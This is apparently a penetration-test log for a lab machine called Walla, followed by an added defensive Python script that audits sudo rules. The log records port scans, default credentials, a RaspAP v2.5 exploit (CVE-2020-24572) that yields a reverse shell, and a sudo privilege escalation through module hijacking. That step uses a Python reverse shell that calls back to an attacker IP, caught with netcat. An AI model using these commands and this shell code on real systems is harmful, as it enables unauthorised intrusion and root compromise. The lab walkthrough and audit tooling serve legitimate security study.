Walla

Pentest Log: 2025-08-11

๐Ÿ” Target Information

ip=192.168.187.97

Enumeration

Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 23

Port 25

Port 53


Port 422

Port 8091

Web Content Enumeration

gobuster dir -u http://$ip:8091 -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Found /package.json and the home page of the system; obtained the system's default credentials:

admin:secret

After login, found:

RaspAP v2.5

Googled "RaspAP v2.5 exploit" and found:

CVE-2020-24572

Port 42042

Exploitation

Vulnerability Summary

Exploit Execution

Exploit Method

Tool / Script Used:

https://github.com/gerbsec/CVE-2020-24572-POC

python3 exploit.py $ip 8091 192.168.45.163 8091 secret 1

penelope -p 8091

Privilege Escalation

Current Access

๐Ÿ” Enumeration

Sudo:

sudo -l

Found:

User www-data may run the following commands on walla:
    (ALL) NOPASSWD: /sbin/ifup
    (ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py
    (ALL) NOPASSWD: /bin/systemctl start hostapd.service
    (ALL) NOPASSWD: /bin/systemctl stop hostapd.service
    (ALL) NOPASSWD: /bin/systemctl start dnsmasq.service
    (ALL) NOPASSWD: /bin/systemctl stop dnsmasq.service
    (ALL) NOPASSWD: /bin/systemctl restart dnsmasq.service

Privilege Escalation Exploit

Exploit Summary

Exploit Steps

mousepad wificontroller.py

import socket, subprocess, os
import pty


def stop(num1, num2):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.45.163", 25))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("/bin/bash")


def reset(num1, num2):
    pass


def start(num1, num2):
    pass

sudo /usr/bin/python /home/walter/wifi_reset.py

nc -lvnp 25
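
An added audit example (not part of the original log and not RaspAP code): it parses the `sudo -l` output above, picks out rules that run a script through an interpreter, and flags the script or its directory when either is not root-only. Python puts the script's directory first on its module search path, so a non-root-writable directory lets modules the script imports be replaced. The function names and the interpreter list are assumptions of this example, and it covers interpreters beyond the Python rule in the log.

```python
import os
import re
import stat

# `sudo -l` lines copied from the log above (systemctl rules trimmed to one).
SUDO_L = """\
User www-data may run the following commands on walla:
    (ALL) NOPASSWD: /sbin/ifup
    (ALL) NOPASSWD: /usr/bin/python /home/walter/wifi_reset.py
    (ALL) NOPASSWD: /bin/systemctl start hostapd.service
"""

# "(runas) [TAG: ...] /absolute/command args", as printed by sudo -l.
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?:\w+:\s*)*(?P<cmd>/.*)$")
INTERPRETERS = re.compile(r"^(python|perl|ruby|php|node|bash|sh)[\d.]*$")  # assumed list


def interpreter_rules(sudo_l_text):
    """Return (interpreter, script) for each rule that runs a script file."""
    found = []
    for line in sudo_l_text.splitlines():
        m = RULE.match(line)
        argv = m.group("cmd").split() if m else []
        is_interp = len(argv) >= 2 and INTERPRETERS.match(os.path.basename(argv[0]))
        if is_interp and argv[1].startswith("/"):
            found.append((argv[0], argv[1]))
    return found


def non_root_writable(path):
    """True if path is owned by a non-root user or is group/world-writable."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(sudo_l_text):
    """Flag scripts, and the directories they load modules from, that are not root-only."""
    findings = []
    for _interp, script in interpreter_rules(sudo_l_text):
        for target in (script, os.path.dirname(script)):
            try:
                if non_root_writable(target):
                    findings.append((script, target, "writable by non-root"))
            except OSError:
                findings.append((script, target, "cannot stat: check on the host"))
    return findings


if __name__ == "__main__":
    print(*audit(SUDO_L), sep="\n")
```

Run it on the host that owns the sudoers rules, feeding it that host's own `sudo -l` output; any finding means the rule should point at a root-owned script in a root-owned directory.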